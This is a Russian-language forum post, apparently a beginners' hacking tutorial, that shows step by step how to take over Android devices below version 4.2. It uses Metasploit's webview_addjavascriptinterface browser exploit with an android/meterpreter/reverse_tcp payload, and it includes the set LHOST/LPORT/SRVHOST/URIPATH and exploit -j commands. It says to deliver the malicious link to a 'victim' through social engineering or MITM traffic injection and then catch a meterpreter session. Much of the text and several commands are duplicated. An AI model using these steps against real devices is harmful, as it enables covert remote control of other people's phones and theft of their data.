Итак всем привет.Пост для совсем новичков)) Бывалые наверняка его юзали, но тут на форуме описания этого эсплойта еще не видел)
Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств версии не больше (4.2.x)
Если устройства с андроидом выше версии то смотрите эту статью
И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.
И так все что нам понадобиться:
1) Запустить метасплоит
2) Выбираем наш эксплойт:
3) Задаем опционально LHOST , LPORT для пейлоада,который по дефолту тот что нам нужен(android/meterpreter/reverse_tcp) URIPATH - текст ссылки который будет идти после IP ,SRVHOST и SRVPORT соотведственно IP и порт на котором будет запущен веб сервер.
4) Применяем Соц.Инженерии и даем ссылку жертве или заражаем трафик при МИТМ атаках с инжектом вредоносной ссылки...
5)Ловим метерпретер сессию
Сегодня мы узнаем о еще одном очень легком способе взлома андроид устройств версии не больше (4.2.x)
![5.png](/proxy.php?image=http%3A%2F%2Fi.piccy.info%2Fi9%2F84a157d75a7cc8d29935b50303792a6d%2F1478693933%2F62142%2F1086810%2F5.png&hash=a8acb4903161eedd90b4ff9907254788)
Если устройства с андроидом выше версии то смотрите эту статью
И так если вы обнаружили в своем сегменте сети (на одном WiFi к примеру ) или заведомо известно что ваша жертва использует девайс на андроиде версии ниже чем 4.2.x то этот эксплоит вам подойдет.
И так все что нам понадобиться:
1) Запустить метасплоит
2) Выбираем наш эксплойт:
Код:
use exploit/android/browser/webview_addjavascriptinterface
![1.jpg](/proxy.php?image=http%3A%2F%2Fi.piccy.info%2Fi9%2Fe9bf886ca4ab187715e7bd2725539860%2F1478693976%2F139304%2F1086810%2F1.jpg&hash=725fdedea386bb2cf8a072459a7bc44b)
3) Задаем опционально LHOST , LPORT для пейлоада,который по дефолту тот что нам нужен(android/meterpreter/reverse_tcp) URIPATH - текст ссылки который будет идти после IP ,SRVHOST и SRVPORT соотведственно IP и порт на котором будет запущен веб сервер.
set LHOST наш_ip_адрес
set LPORT наш_порт_на_котором_будем_ловить_соединение
set SRVHOST IP__наш_адрес
set URIPATH текст_ссылки
exploit -j
set LPORT наш_порт_на_котором_будем_ловить_соединение
set SRVHOST IP__наш_адрес
set URIPATH текст_ссылки
exploit -j
![3.jpg](/proxy.php?image=http%3A%2F%2Fi.piccy.info%2Fi9%2F93e0c0f122c76b75c4c0ff2763513609%2F1478694033%2F139690%2F1086810%2F3.jpg&hash=93d9c9a47a559d2529246115f5cfe1b6)
4) Применяем Соц.Инженерии и даем ссылку жертве или заражаем трафик при МИТМ атаках с инжектом вредоносной ссылки...
![4.png](/proxy.php?image=http%3A%2F%2Fi.piccy.info%2Fi9%2Fb0f51a608667e3888b7583d0f75845ab%2F1478694098%2F211869%2F1086810%2F4.png&hash=dc2864d1db9ccc132e9a363dc8909155)
5)Ловим метерпретер сессию
![6.jpg](/proxy.php?image=http%3A%2F%2Fi.piccy.info%2Fi9%2F3956d0b76b4e6a1f10b6df52bbb5fac9%2F1478694125%2F191456%2F1086810%2F6.jpg&hash=eb0341821ef0111ff503f80595e84e23)